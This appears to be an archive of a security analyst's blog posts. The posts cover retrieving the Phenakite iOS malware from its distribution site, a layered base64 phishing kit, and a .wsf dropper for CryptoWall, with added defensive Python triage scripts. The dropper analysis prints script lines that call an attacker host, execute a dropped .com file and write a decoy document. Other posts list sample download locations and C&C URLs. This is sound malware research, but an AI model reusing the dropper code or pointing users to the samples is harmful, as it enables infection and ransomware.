Tuesday, May 4, 2021

Grab your own copy of Phenakite iOS malware today

Facebook has recently published a technical paper regarding a threat actor named APT-C-23.

Almost half of their report is about a new iOS malware used by the threat actor.

Facebook called this malware Phenakite and provided 2 hashes of malware samples; however, those samples are not publicly available (yet).

Since I am an Android type of person, naturally the Android malware interested me more than the iOS malware.

After playing a little with the Android malware, I decided to see what I could learn about the iOS malware, but how? I don't have any sample, and I am quite clueless about Apple devices at every possible level. Well:

We don’t need bombs we got fire kites

Fortunately, the distribution site of the malware was still alive:



Well, not much to do other than download the app. Well, apparently the link is not the app directly:


The file is binary, but it also contains strings that might be interesting. There are several tools that parse mobileconfig files; a curious reader might try to parse the file for additional information, as it probably triggers the download of the app after the policy is accepted.

But now what?

Feeling stuck? No worries, I felt the same. Since I don't have an iOS device to try it out, I decided to inspect the code of the website:


Oh, look at that, commented code; that must be good :P


WhoOpSec!


There was also a reference to a file named app.plist. Let's try to grab it, shall we?



OK, this is plain text and simple: the software package is app.ipa. Let's grab that as well:
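For readers who want to do the mobileconfig and app.plist parsing mentioned above offline, here is an added example (my own code, not something from the post or from the malware's site). It assumes two things I have labelled in the code: a signed mobileconfig is a CMS/DER envelope with the XML plist still readable inside it, and the OTA manifest follows Apple's items/assets layout where the "software-package" asset carries the .ipa URL. The sample profile and manifest are constructed and point at example.invalid placeholders.

```python
# Added example, not code from the blog post: pull URLs and payload types out of a
# .mobileconfig profile and an OTA manifest .plist without touching a device.
# Sample documents below are constructed; the domain example.invalid is a placeholder.
import plistlib
import re

URL_RE = re.compile(r"https?://[^\s\"'<>]+")


def load_profile(blob: bytes) -> dict:
    """Parse a .mobileconfig. A signed profile is a CMS/DER wrapper around the XML plist,
    and the plist is stored in cleartext inside it, so when plistlib cannot read the blob
    directly, carve the <?xml ... </plist> span out of the binary and parse that."""
    try:
        return plistlib.loads(blob)
    except Exception:
        pass
    start = blob.find(b"<?xml")
    end = blob.find(b"</plist>")
    if start == -1 or end == -1 or end < start:
        raise ValueError("no XML plist found inside the blob")
    return plistlib.loads(blob[start:end + len(b"</plist>")])


def walk_strings(node):
    """Yield every string value in a parsed plist, whatever its nesting."""
    if isinstance(node, dict):
        for value in node.values():
            yield from walk_strings(value)
    elif isinstance(node, list):
        for value in node:
            yield from walk_strings(value)
    elif isinstance(node, str):
        yield node


def profile_summary(profile: dict) -> dict:
    """The fields an analyst wants first: identity, the payload types it installs, every URL."""
    return {
        "identifier": profile.get("PayloadIdentifier"),
        "display_name": profile.get("PayloadDisplayName"),
        "payload_types": [p.get("PayloadType") for p in profile.get("PayloadContent", [])],
        "urls": sorted({u for s in walk_strings(profile) for u in URL_RE.findall(s)}),
    }


def manifest_packages(manifest) -> list:
    """An OTA install manifest lists items[].assets[]; the asset of kind
    'software-package' is the .ipa the device will download. Accepts raw bytes or a dict."""
    if isinstance(manifest, bytes):
        manifest = plistlib.loads(manifest)
    packages = []
    for item in manifest.get("items", []):
        meta = item.get("metadata", {})
        for asset in item.get("assets", []):
            if asset.get("kind") == "software-package":
                packages.append({"bundle": meta.get("bundle-identifier"),
                                 "version": meta.get("bundle-version"),
                                 "url": asset.get("url")})
    return packages


# Constructed sample: a web-clip profile pointing at a manifest, wrapped in junk bytes
# to imitate the DER envelope of a signed profile.
SAMPLE_PROFILE = {
    "PayloadType": "Configuration",
    "PayloadVersion": 1,
    "PayloadIdentifier": "com.example.fake.profile",
    "PayloadDisplayName": "Install App",
    "PayloadContent": [{
        "PayloadType": "com.apple.webClip.managed",
        "PayloadIdentifier": "com.example.fake.profile.webclip",
        "Label": "App",
        "URL": "https://downloads.example.invalid/app.plist",
    }],
}
FAKE_SIGNED_PROFILE = b"\x30\x82\x01\x00" + b"\x00" * 16 + plistlib.dumps(SAMPLE_PROFILE) + b"\xaa" * 8

SAMPLE_MANIFEST = plistlib.dumps({
    "items": [{
        "assets": [{"kind": "software-package", "url": "https://downloads.example.invalid/app.ipa"}],
        "metadata": {"bundle-identifier": "com.example.chat", "bundle-version": "1.0",
                     "kind": "software", "title": "App"},
    }],
})

if __name__ == "__main__":
    print(profile_summary(load_profile(FAKE_SIGNED_PROFILE)))
    print(manifest_packages(SAMPLE_MANIFEST))
```

Point load_profile at the bytes of a downloaded mobileconfig and manifest_packages at the bytes of the manifest it references; the URL list is what you feed into blocking or further collection, and the payload types tell you whether the profile only adds a web clip or also pushes things like certificates or VPN settings.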



Ah, close, but no cigar: this hash doesn't match the two samples in Facebook's report.

Could it be a new sample? I doubt it; look at the date. So what is this file? An ipa, obviously! Not to be confused with IPA.

Essentially it is a Zip file, so let's unzip that payload:


I moved all the images to a folder to keep only the potentially interesting files from the archive. One of them, "app", stands out; what is it?



And that, kids, is how I met your malware, e567efd5c800c5b0c6eb5aa0bccc10e9. I met her on Facebook('s report).

Congratulations, this is the first time the blog actually does what it stands for: sharing malware for everyone, with a hint of analysis. (If you are reading this too late and the distribution site of the malware is down, no worries; it is also available on VirusTotal, both as a standalone file and as an archive.)

Now you can enjoy your own copy of Phenakite and start reversing the Mach-O, if you know how to :)
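The unzip-and-hash steps above, as an added example in Python (mine, not the post's): it opens an .ipa as the zip it is, skips the images like I did by hand, reads Info.plist for the bundle id and main executable, and hashes every member that starts with a Mach-O magic. The archive it runs on is constructed in memory with a fake 64-bit header, so nothing here is the real sample.

```python
# Added example, not code from the blog post: open an .ipa as the zip it is,
# skip the images, read the bundle's Info.plist, and hash whatever member carries a
# Mach-O header. The sample archive is constructed in memory, with a fake header.
import hashlib
import io
import plistlib
import zipfile

MACHO_MAGICS = {
    b"\xfe\xed\xfa\xce": "Mach-O 32-bit (big-endian)",
    b"\xce\xfa\xed\xfe": "Mach-O 32-bit (little-endian)",
    b"\xfe\xed\xfa\xcf": "Mach-O 64-bit (big-endian)",
    b"\xcf\xfa\xed\xfe": "Mach-O 64-bit (little-endian)",
    b"\xca\xfe\xba\xbe": "Mach-O universal (fat) binary",  # same magic as Java .class files
}
IMAGE_EXTS = (".png", ".jpg", ".jpeg", ".gif")


def hashes(data: bytes) -> dict:
    """The three digests the blog lists for each sample."""
    return {
        "md5": hashlib.md5(data).hexdigest(),
        "sha1": hashlib.sha1(data).hexdigest(),
        "sha256": hashlib.sha256(data).hexdigest(),
    }


def triage_ipa(ipa_bytes: bytes) -> dict:
    result = {"bundle": None, "executable": None, "members": [], "machos": [], "skipped_images": 0}
    with zipfile.ZipFile(io.BytesIO(ipa_bytes)) as zf:
        for info in zf.infolist():
            name = info.filename
            if info.is_dir():
                continue
            if name.lower().endswith(IMAGE_EXTS):
                result["skipped_images"] += 1
                continue
            result["members"].append(name)
            data = zf.read(name)
            # Payload/<name>.app/Info.plist names the bundle and its main executable
            if name.endswith("/Info.plist") and name.count("/") == 2:
                plist = plistlib.loads(data)
                result["bundle"] = plist.get("CFBundleIdentifier")
                result["executable"] = plist.get("CFBundleExecutable")
            kind = MACHO_MAGICS.get(data[:4])
            if kind:
                result["machos"].append({"path": name, "kind": kind, **hashes(data)})
    return result


# Constructed sample: 64-bit little-endian magic followed by zero padding, not a real binary
SAMPLE_MACHO = b"\xcf\xfa\xed\xfe" + b"\x00" * 60


def build_sample_ipa() -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("Payload/app.app/Info.plist",
                    plistlib.dumps({"CFBundleIdentifier": "com.example.chat",
                                    "CFBundleExecutable": "app"}))
        zf.writestr("Payload/app.app/app", SAMPLE_MACHO)
        zf.writestr("Payload/app.app/icon.png", b"\x89PNG\r\n\x1a\n")
        zf.writestr("Payload/app.app/PrivacyPolicy.txt", b"Lorem ipsum dolor sit amet")
    return buf.getvalue()


if __name__ == "__main__":
    import sys
    ipa = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_ipa()
    report = triage_ipa(ipa)
    print("bundle:", report["bundle"], "executable:", report["executable"])
    for m in report["machos"]:
        print(m["path"], m["kind"], m["md5"], m["sha1"], m["sha256"])
```

Run it with the path to a real .ipa as the first argument; the printed digests of the Mach-O member are what you compare against the hashes in a vendor report. Identifying the binary by its magic rather than by name also catches the case where the executable is not the file Info.plist says it is.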


Bonus lol's:

The terms of service of the malware are... Lorem Ipsum:


The privacy policy seems to be borrowed from "relatedcode.com", which has an open-source chat-for-iOS repository; this is most likely the chat app that Facebook was referring to:


All your base is on fire:


More interesting strings:



phenakite.zip

MD5: 54e5e93c00c963cb66fd2d248c4c6ce7
SHA-1: 05527dddb79329d844f1954e3d36601926410bca
SHA-256: c2d66369c974558adbcd801b409492b73ad1cb5f9f412ef3a8820f1cae526903

app

MD5: e567efd5c800c5b0c6eb5aa0bccc10e9
SHA-1: da99195ff43093fb8237201e2ce412a925580a53
SHA-256: e1494164865acb719c1e32c86adf810ce52fcc48c46e777b9f98a99648de62c2

Monday, June 27, 2016

Fasterized Phishing Fail

Hi all, so this is a quick and short post about an epic fail involving a bank, AV vendors and a SaaS provider.

So, I'm minding my own business, thinking to go phishing for some new shizzle, and all of a sudden le wild credit-agricole phish appears:


Checking VT, a whopping 10/67 results say this is a phish! Hide yo kids, hide yo pass.
So me, as kind of a n00b, thought: hey, those people at those vendors have more experience, they must know what they are talking about.
So I started to snoop around, as that domain shadowing seemed quite interesting.
Apparently the AV vendors don't know what they are doing; it's either the horde detection or a bad detection algorithm, because as soon as I checked what it is, I immediately found that those funny domains belong to fasterize, a service that acts as a smart proxy for your site to reduce bandwidth and the load times of the pages. Apparently it is also the fast track to getting your site blacklisted for "phishing", because the URL mimics the real credit-agricole site.

Conclusion: blacklisting is crap; there will always be another bad domain, but whitelisting would have saved the embarrassment here. I think fasterize is a new service and they should communicate with the AV vendors with aggressive blacklists if they want to offer their service to banks.

Bonus: they need to update their certificate.



Tuesday, May 17, 2016

Android super charge crap lockscreen

It's been a while, quite busy with... stuff...
But here is a quick post about something annoying.
After I had updated several apps on my Android phone, I suddenly noticed a weird lock screen.
My first reaction was WTF, because after I swiped, my original lock screen appeared.
So I looked at the list of updated applications, looked at all my installed apps, but nothing was really standing out.
So I looked on Google, and it appears to be a new trend, for unknown reasons.

Here are a few links:

http://forums.androidcentral.com/samsung-galaxy-s6-edge/512443-charging-screen-question.html
http://forums.androidcentral.com/samsung-galaxy-note-4/640251-new-speed-charge-battery-status-lock-screen-annoying-ads-just-appeared-gn4-2.html
http://android.stackexchange.com/questions/143330/what-is-this-lock-screen-with-ads-and-how-do-i-remove-it
http://androidforums.com/threads/speed-charge-on-lock-screen.1010631/
https://www.reddit.com/r/Android/comments/4g8hbq/psa_amber_weather_widget_223_adds_du_quick_charge/
https://www.reddit.com/r/galaxynote5/comments/45ahkp/wtf_the_ads_showing_on_the_charging_lock_screen/

And I even spotted one of the apps that had been updated in this thread:

https://www.reddit.com/r/nexus6/comments/4ilwcl/ive_had_my_nexus_6_since_release_today_it_asked/

So, I was quite confident this wasn't some malware (although I don't have anything worthy on my phone), and in the worst case I'm suffering some excessive battery drain (all those apps are fake shit, I hope you know that) and maybe I will get some ads, although I didn't get any :<

The easiest solution was of course just to uninstall the shit and see how it goes, but I decided to be more technical and try to do some adb shell "magic":


adb shell dumpsys window windows | grep -E 'mCurrentFocus|mFocusedApp'
So... it was indeed the photo editor...
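To save the next person from reading dumpsys output by eye, here is an added example (my own, not from the post) that parses the mCurrentFocus/mFocusedApp lines the command above greps for and names the package owning the focused window. The dumpsys text in it is constructed to look like real output; the package, activity and hex ids are made up, and the assumption that the real lock screen belongs to com.android.systemui is marked in the code.

```python
# Added example, not code from the blog post: parse the output of the adb command above
# and name the package that owns the focused window. The dumpsys text below is constructed
# to look like real output; the package and activity names in it are made up.
import re
import subprocess

FOCUS_RE = re.compile(
    r"\b(mCurrentFocus|mFocusedApp)=.*?\bu(\d+)\s+([A-Za-z0-9_.]+)/([A-Za-z0-9_.$]+)")

# Assumption: on a stock device the keyguard/lock screen is drawn by SystemUI, so a
# focused lock-screen-looking window owned by anything else deserves a look.
EXPECTED_LOCK_SCREEN = {"com.android.systemui"}


def parse_focus(dumpsys_text: str) -> dict:
    """Map each focus field to {user, package, activity}; fields set to null are skipped."""
    found = {}
    for line in dumpsys_text.splitlines():
        m = FOCUS_RE.search(line)
        if m:
            field, user, package, activity = m.groups()
            found[field] = {"user": int(user), "package": package, "activity": activity}
    return found


def unexpected_overlay(focus: dict, allow=EXPECTED_LOCK_SCREEN) -> list:
    """Packages holding focus that are not the system's own lock screen."""
    return sorted({v["package"] for v in focus.values() if v["package"] not in allow})


def live_focus() -> dict:
    """Same check against a connected device (needs adb on PATH and USB debugging on)."""
    out = subprocess.run(["adb", "shell", "dumpsys", "window", "windows"],
                         capture_output=True, text=True, check=True).stdout
    return parse_focus(out)


SAMPLE_DUMPSYS = """\
WINDOW MANAGER WINDOWS (dumpsys window windows)
  Window #3 Window{2f4a1b9 u0 com.example.photoeditor/com.example.photoeditor.ChargeScreenActivity}:
    mOwnerUid=10123 mShowToOwnerOnly=true package=com.example.photoeditor appop=NONE
  mCurrentFocus=Window{2f4a1b9 u0 com.example.photoeditor/com.example.photoeditor.ChargeScreenActivity}
  mFocusedApp=AppWindowToken{5c0d3e token=Token{1a2b3c ActivityRecord{7d8e9f u0 com.example.photoeditor/.ChargeScreenActivity t42}}}
"""

if __name__ == "__main__":
    focus = parse_focus(SAMPLE_DUMPSYS)
    for field, info in focus.items():
        print(field, info["package"], info["activity"])
    print("not the system lock screen:", unexpected_overlay(focus))
```

Run live_focus() while the bogus charging screen is showing; whatever package comes back in unexpected_overlay is the one to uninstall or to check in the app's settings.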

Here are some pictures of this magnificent app:



I must say that the settings actually worked, and it disabled that lock screen, and right after that I uninstalled it.

Another note: the lock screen would appear only when the phone is charging (so you could get the super duper mega fast charge boost).

Thursday, December 17, 2015

base64 fileless phishing kit

Phishing kits are boring most of the time, and you can't fight stupid (users).
I have recently come across an interesting kit. Thumbs up for the threat actor; if he had only worked a bit on the e-mail that he sends to victims (can't share), it could have been much deadlier.

So how does this work?
1) The threat actor sends a bunch of emails to a big victim list; the email message is some "blabla please sign in to DocuSign to view the document in Google Docs" etc...

Sometimes the emails are in HTML format, so they change the <a href > tag so it looks like a legit link when you hover over it, but when you click it sends you to a different URL.
In this case the attacker chose to use URL shortening:
ht=tp://www.bit.ly/1Q5RMSN

This url is pointing to:
hXXp://jqueryapi.info/?getsrc=ok&ref=&url=data%3Atext%2Fhtml%3Bbase64%2CPFNjcmlwdCBMYW5ndWFnZT0nSmF2YXNjcmlwdCc%2BDQoNCmRvY3 ....

full url: http://pastebin.com/rPZ7Dzrt

jQuery, you say? The data is a base64 blob; if we copy the blob (starting with "PFN") into some decoder we will get some nice clear text like:

<Script Language='Javascript'>

document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67

full: http://pastebin.com/dbv30qp2

Bang, 2nd layer of obfuscation: a JS with unescape obfuscation.
After decoding that we get another clear text, with yet another script!
<script language="javascript" type="text/javascript">var l1l='=oQKpkyJ8dCK0lGbwNnLnkXYsB3cpRmMywHf

full: http://pastebin.com/Vu2mAzV6

Damn son, 3rd layer of obfuscation, with another JS code containing eval and some custom encryption. Even if we beautify the code it still looks nasty.
I don't really care to go through all the code with a debugger to see exactly what happens, and probably you don't either, so let's create an HTML file with the JS code and change the "eval(_1OI(_1I1(l1l)));" call at the end to "window.alert(_1OI(_1I1(l1l)));"
This will simply print us the evaluated code in an alert box, and if we open it in a browser we will get the result:

"eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+"

w00t? Another eval with custom encryption? 4 obfuscation layers for phishing? Dude, you are crazy!
OK, let's do the trick of window.alert instead of eval again?
Unfortunately the new code is too long for the alert box, so it is cut before the end, and trying that trick results in an empty page.
So let's go back and change the "eval/window.alert" to "document.write".
We know it is safe to do because we saw in the first trick that the output is eval, and not <script>.

full: http://pastebin.com/L3PrgjWK

OK, now I got stuck for a while, because I tried to apply the previous methods and they didn't work, while adding document.write to the eval would show the phishing page.
After some googling I found http://handlers.sans.org/dwesemann/decode/
Using #2 - The Tom Liston Method, I got in the result another eval that looked very familiar to the one I had. I thought maybe I did something wrong, so I pasted the output into my HTML page to show me the code after "eval".
Once again the result was with "eval"; this time I noticed there is a slight change to the code, so I continued changing my HTML with the output of showme().
After 3 or 4 times of running this I got a new code in the text area:
"var _escape='%3C%21DOCTYPE%20html%3E%0A%3Chtml%20lang%3D%22en%22%3E%0A%20%20%3Chead%3E%0A "

Another obfuscation!!!

full: http://pastebin.com/nHXBj5bB

OK, this finally looks like the end of the saga. At the end there is a check whether the user agent is Rambler or Yandex (Russian sites); I guess the attacker is Russian and doesn't want to phish his own people. There is another check for "Yaho", I guess this is a typo, and finally it unescapes "var _escape" and writes the pure HTML to the page.

So here is the final result: http://pastebin.com/xDLTHPTN
This was actually picked up by my ISP's content filtering, so this 7-layer fileless obfuscation actually works quite well to bypass many filters.

TL;DR

block hXXp://www.ndsnotebook.com.br/wp-includes/css/themes/

Wednesday, December 16, 2015

.wsf malware?

So I've stumbled upon something "new", a .wsf file; this is basically a fancy .vbs file.

URL to sample (as sent in the mail from the threat actor, the usual invoice bull crap):
hXXps://www.mediafire.com/download/q1yqupocyigke3k/INVOICE_8329380DF.doc_.wsf
mirror: https://malwr.com/analysis/YWY2NjY3ZDhlYzUwNGI4ZGE4OTZhNzE4NjFiNDcwYTY/
MD5: 70ca3b4d70f564348e2d3ba903e78b5e
SHA-1: e5023bd075a47b6de994d4ea7c757fa7ce7fcbb4
SHA-256: 9c007e99407b961ad34baa86b017867f75628f28b642e37ea1635ee5b1aa83e6


Now if we open that file we will see, in the first line and a few hundred following it, gibberish text like this:

"/*Gelder Sunbelt Discontent Hookey Chared
Precipiced 
Infarct Hydrostatics ..."

This is basically one big comment that is meant for evasion of AV/analysts/ninjas...
After a few more lines you will find the end of the comment, the start of the .wsf file (job), and a new comment...
"Torquing*/
<job>
/*Teleph"

More blablabla, and we will find the most interesting part:
"Eviscerates Franking Anesthesiology Shamefaced
Streetlight Floorings*/

#@~^Wl8AAA==&JytksAmAhmU$kL?kxL!(ybn1.m$4[:wXVmp:Ph\X}hUd} s-3Hs\-"

The string "#@~^" indicates that this is encrypted VBS (.vbe). I have encountered such before, but I never actually could find a good working method to decode them, up until now.
A user named "Hackoo" at Stack Overflow posted this nice code that does the job perfectly:
http://stackoverflow.com/questions/32882622/convert-vbs-encrypted-script-to-string

After we decode the .vbe we get some more gibberish, like this:

"if (!nAkTeFqOrAeRcwmTaBmAhangdYaVmLhHuExSkLgEedqGrGwSuCnHatiScgug.fileexists(aIcNlbnOkdsItSgUnTihbIfcfBrGaakHgIfCiWwWdVfamwciqG+'\\qAcTyGsrkHlBagwS.doc')) {
//lPwCyOgfdAoXiflWaqeluLlDcGagxtrKaBbttMsIciwQgslGgXctbAlWmPmcmGfyyXsSbAnGavtDnEqTrEhyxMgZbBlEoQmLpBeShWuRhYkSbxxIuqpTrkmquSfAiRyDgibAhgrGgnmBwyxGuHkAaTbskrgOfUmFwMtmyGvIeHeQdVlytgqOrFuAfOpgrMiQoEqPaWqTaGcaeLgFdGkLkWxYngvKlanwyKbKtkktyUtxeAkYgYyEwimTomlagTcCpUeRmpqlkcaWgChAqVgGuRdZsHhBoBhFyAbObDnGyGxGcUcB
//agnXrHaNpCfKwOahkLiZnPmAufcPuAhbfbwnqPlLoOfpqGgDpRigbUpGdwmamBvazCgrzNgGhSwAagxKqvcucfxUdIoFsSvMdHdRmhiPpOkPcPrZsOtBqAqPpWhueVgUhMiWwOpLvUgWfEaKyigKwCpGePwZsMcZtupGvCzHuphGaElAnQemtgvZdMfurRaMwLhohRydbEkurKrGrVaUqdbVgtaKcFaymexPkRnclroHgLzQvBfFqwdAfGwLgZrDbAswtDlgrHegaZwkhUawdMmZrLhUhldoyQmRgAtEyRhSoVvFhqbWqMkcvEexzEsIcEhBeGtOflkFmdsdaPzYlbhTfWhkfRgQ
//gWytuPsKlhaZqAiwvLrCwYnAmFuOpGnihKdDlgcCrXtNuXzFdBbiaDtQgVfVvSgtqVrNdruFgOwQdWngpAaAqaeGgZvftLyzlGhDoYbdoZescppVoD
//hPpAwBiZmHbEynvxighIdqgObGvOhXcXaDpUgdyWxokZrFxBoXpFkWxupOzGrCpVgzoCgZkidCqVoGxFoGrUqFaqfTuFcOgAoFafkzyBlofKtBxogCgIyOsGrWtBiOfnpYlOcQwEyRvlyMsvbYnGdQqDhrxVfCvOzQ
//aEsHkVkRxDnVgRiqpWpBxevQtAcXaGyzmGaOiAytybmklWlGgExmyHwDkAqvdPlYyunTdBfWzruVhkxGalrVxOlMtbthvRkFmQfPmXaVkApHpQgMpygybUfYdgbOgWmAivnXuefBaTslahgYgGgHyZimuasTmasGkPlBgRqLuAnToZfGgtaSsSnakeovlOaxwqdsaPgSpRdtsIaSwyxGltfRbezSrfdCfgqDaZnYbakyaAgEbCbItruGgMdBdYsGxQfYsTncgPdCudaUoatVbFuQiYmAtAcYrNaNcblRdGwBlaoTqRiVgIcIvXfWoDfHoQvBoXdOpXiWcAuSrPqewNeUbEgDgntKfdoceyobqDaSpSuEaDpDwKylvEqCpWvcdTnYncyevCpGaHiTfBsYkGyBrfpIbDtIhFaBbYmYeCwGhGcHssgYipvKsMvTaXttgynQosgCgU
var  bQgadMaXdIiIfPuOyCpZfZxocXlLmZslmtgSbV=WScript.CreateObject('MSXML2.XMLHTTP');
bQgadMaXdIiIfPuOyCpZfZxocXlLmZslmtgSbV.open('PUT','http://aolmessenger.su/update/check.php',false);
bQgadMaXdIiIfPuOyCpZfZxocXlLmZslmtgSbV.send();" 

Again, the threat actor is using // comments to make the untrained eye fail to find "http://aolmessenger.su/update/check.php".

So after removing the comments from the decrypted .vbe we end up with an easy .vbs file that connects to:
http://aolmessenger.su/update/check.php 
and
http://aolmessenger.su/update/info.doc
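The comment removal described above is worth automating, because a naive "strip everything after //" also eats the http:// inside every URL string. Here is an added example (my own, not from the post) that spots the "#@~^" encoder marker, strips /* */ and // comments while leaving string literals alone, and then lists the URLs and the interesting WSH/COM calls that remain. The script it runs on is constructed in the shape of the decoded excerpt above; the example.invalid hosts are placeholders, not the real domain.

```python
# Added example, not code from the blog post: triage a decoded .wsf/.vbe script body by
# removing JScript-style comments (without touching string literals) and listing what is
# left. SAMPLE_SCRIPT is constructed to mirror the shape of the post's excerpt.
import re

VBE_MARKER = "#@~^"
URL_RE = re.compile(r"https?://[^\s\"'<>)]+")
# Calls worth a second look in a script that arrived as an "invoice"
SUSPICIOUS_CALLS = ["WScript.CreateObject", "MSXML2.XMLHTTP", ".Exec(", ".SaveToFile(",
                    "Scripting.FileSystemObject", "ADODB.Stream"]


def looks_like_vbe(text: str) -> bool:
    """Microsoft Script Encoder output starts with '#@~^'."""
    return VBE_MARKER in text


def strip_comments(src: str) -> str:
    """Remove /* */ and // comments but copy quoted strings through untouched, so the
    '//' inside 'http://...' is not mistaken for a line comment."""
    out = []
    i, n = 0, len(src)
    while i < n:
        c = src[i]
        if c in "\"'":                       # string literal: copy up to the closing quote
            q, j = c, i + 1
            while j < n and src[j] != q:
                if src[j] == "\\":           # skip an escaped character
                    j += 1
                j += 1
            out.append(src[i:j + 1])
            i = j + 1
        elif src.startswith("/*", i):        # block comment
            j = src.find("*/", i + 2)
            i = n if j == -1 else j + 2
        elif src.startswith("//", i):        # line comment, keep the newline itself
            j = src.find("\n", i)
            i = n if j == -1 else j
        else:
            out.append(c)
            i += 1
    return "".join(out)


def triage_script(src: str) -> dict:
    body = strip_comments(src)
    return {
        "encoded": looks_like_vbe(src),
        "urls": sorted(set(URL_RE.findall(body))),
        "calls": [call for call in SUSPICIOUS_CALLS if call in body],
        "chars_removed": len(src) - len(body),
    }


SAMPLE_SCRIPT = """/*Gelder Sunbelt Discontent Hookey Chared
Precipiced Infarct Hydrostatics*/
<job>
/*Teleph*/
//lPwCyOgfdAoXiflWaqeluLlDcGagxtrKaBbttMsIciwQgslGgX http://decoy.example.invalid/not-real
var x = WScript.CreateObject('MSXML2.XMLHTTP');
x.open('PUT','http://dropper.example.invalid/update/check.php',false);
x.send();
var s = WScript.CreateObject('ADODB.Stream');
s.SaveToFile(tmp + '\\\\decoy.doc');
</job>
"""

if __name__ == "__main__":
    print(triage_script(SAMPLE_SCRIPT))
```

Note that the decoy URL buried in the // comment drops out while the one inside the quoted open() argument survives, which is exactly the split you want when turning a decoded script into block-list entries.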
 
You think the threat actor has finished trying to fool us? Think again, here comes the most interesting stuff:
In sandbox analysis the .wsf file drops a .com (PE) and a .doc file.
You can see that in the decoded .vbe strings:
"zHqnrMwaqnaHscsuvNsZyGkSetgTsMsywT.Exec(aIcNlbnOkdsItSgUnTihbIfcfBrGaakHgIfCiWwWdVfamwciqG + '\\uarQrKkeoPnqnOgAgHfZ.com');
gUntydcFbSphhglgyWeNgDkZgYuNlBoDxm.SaveToFile(aIcNlbnOkdsItSgUnTihbIfcfBrGaakHgIfCiWwWdVfamwciqG + '\\qAcTyGsrkHlBagwS.doc');"

The .doc file is clean and it is a decoy to the .wsf file, the file that is saved is actually named "INVOICE_8329380DF.doc                                                                                                                                                                                                           .wsf"
So even if you have extensions enabled in the view, all the blank spaces push the extension out of sight so you barely see it, and the user thinks he opened a .doc file, so he expects a .doc file to be opened, which actually happens with this dummy file.
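The padded-extension trick is cheap to catch on a mail gateway or in a file-drop monitor, so here is an added example (my own, not from the post) that measures the whitespace sitting in front of the real extension and flags a document-looking name that ends in a script extension, by padding or by a plain double extension. The filenames it checks are constructed, and the 8-character padding threshold is my assumption, marked in the code.

```python
# Added example, not code from the blog post: flag a filename that shows one extension
# and ends in another, whether by the whitespace padding the post describes or by a plain
# double extension. The names used below are constructed.
import re

EXT_RE = re.compile(r"\.([A-Za-z0-9]{1,5})$")
DOCUMENT_EXTS = {".doc", ".docx", ".pdf", ".xls", ".xlsx", ".rtf", ".txt", ".jpg", ".png"}
SCRIPT_EXTS = {".wsf", ".vbs", ".vbe", ".js", ".jse", ".hta", ".bat", ".cmd",
               ".exe", ".scr", ".com", ".pif", ".ps1", ".lnk"}
MIN_PADDING = 8  # assumption: a run this long exists only to push the extension out of view


def analyze_filename(name: str) -> dict:
    m = EXT_RE.search(name)
    real_ext = "." + m.group(1).lower() if m else ""
    stem = name[:m.start()] if m else name
    padding = len(stem) - len(stem.rstrip())   # whitespace right before the real extension
    shown = stem.rstrip()                      # what the user sees once the padding scrolls off
    m2 = EXT_RE.search(shown)
    shown_ext = "." + m2.group(1).lower() if m2 else ""
    reasons = []
    if padding >= MIN_PADDING:
        reasons.append("%d whitespace characters before the real extension" % padding)
    if shown_ext in DOCUMENT_EXTS and real_ext in SCRIPT_EXTS:
        reasons.append("looks like %s but is %s" % (shown_ext, real_ext))
    return {"real_ext": real_ext, "shown_ext": shown_ext, "padding": padding,
            "suspicious": bool(reasons), "reasons": reasons}


# Constructed names: the padded one mirrors the post's invoice, the others are controls
SAMPLE_NAMES = [
    "INVOICE_8329380DF.doc" + " " * 200 + ".wsf",
    "invoice.doc.wsf",
    "quarterly_report.docx",
    "photo.final.jpg",
]

if __name__ == "__main__":
    for name in SAMPLE_NAMES:
        verdict = analyze_filename(name)
        print(repr(name[:24]), verdict["suspicious"], verdict["reasons"])
```

The padding check on its own is the useful one: a benign file almost never carries eight spaces before its extension, so it fires regardless of which two extensions the attacker picked.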

doc md5: 03dc2be6251417386887ed968482deb2

Now, check.php with the PUT request in the .vbe caused the download of the .com file.
But if you try to go to that URL yourself you will get this little fella:

x-mas.jpg - md5: b2d625408dfc0347e8202c9ccd36adbb
This nice X-mas greeting is in Russian (Хуй? пизда? джигурда!)
The first two words are common curse words; the 3rd one stumped me, and I found the explanation for this phrase: https://www.youtube.com/watch?v=foodjSqrAh0
If you don't know Russian, put on the English captions; they are hilarious!
So it looks like yet another method of keeping ninjas out, but I have the .com file from the sandbox analysis; maybe if I tried getting it with PUT like the .vbs does, or changing the user agent, I would get it as well.
So what is this final payload? Oh, this is just CryptoWall (4?)

md5: 908185de411e7e513535599540932caa

How do I know it is CryptoWall? If your sandbox is good, the malware will decrypt files, delete the shadow volume, and create help_decrypt files that say welcome to the CryptoWall family.

Every time I ran it I got a different C&C; here are some:
elautech.com/dHgZQD.php?x=98xxxj2adv49w4q (212.172.221.11)
newtone.pl/dJE2Ok.php?g=98xxxj2adv49w4q (91.232.4.242)
shadowdent.ro/KqSF6e.php?w=8mbts9497st8rg (93.115.52.160)
hoffice.nu/t6mWjF.php?y=e08xpt0rx54jh (188.40.99.15)
frenchies.eu/ncgkiT.php?o=2qs3f6poq2h (62.210.178.117)
new-media-consulting.org/8rm6Sc.php?t=55oerfob715 (81.169.145.164)
enguzelilahiler.com/jwtfq9.php?f=yes6nej17cvj0r (178.32.234.11)

From a quick search it looks like the C&C hosts are compromised servers.

The dropped files' domain (aolmessenger.su) looks fairly new, and if you weren't sure the threat is Russian, here is another nail in the coffin:
Looks like the actor wanted to verify his new domain is reachable.
And some registrant info:

Thursday, December 3, 2015

Intro

Hi all, and welcome to my blog.
This is an introduction post to my blog, which will have posts about the adventures of a junior security analyst; the opinions and thoughts expressed here are my own and all that bla bla...
In our area of cyber security, where the threats always change, I have found that personal blog posts are the best source of information. I have learned a lot myself from such posts, and I will constantly add blogs to my reading list, as soon as I figure out how it works.
I have thought about opening my own blog for a while now, to share back, but I hadn't got anything interesting to write about, up until recently.
So this blog should have posts written in an easy and detailed way, so other people can use the info to learn new things as I did.
So stay tuned for the soon-to-be first detailed post about a threat I have found.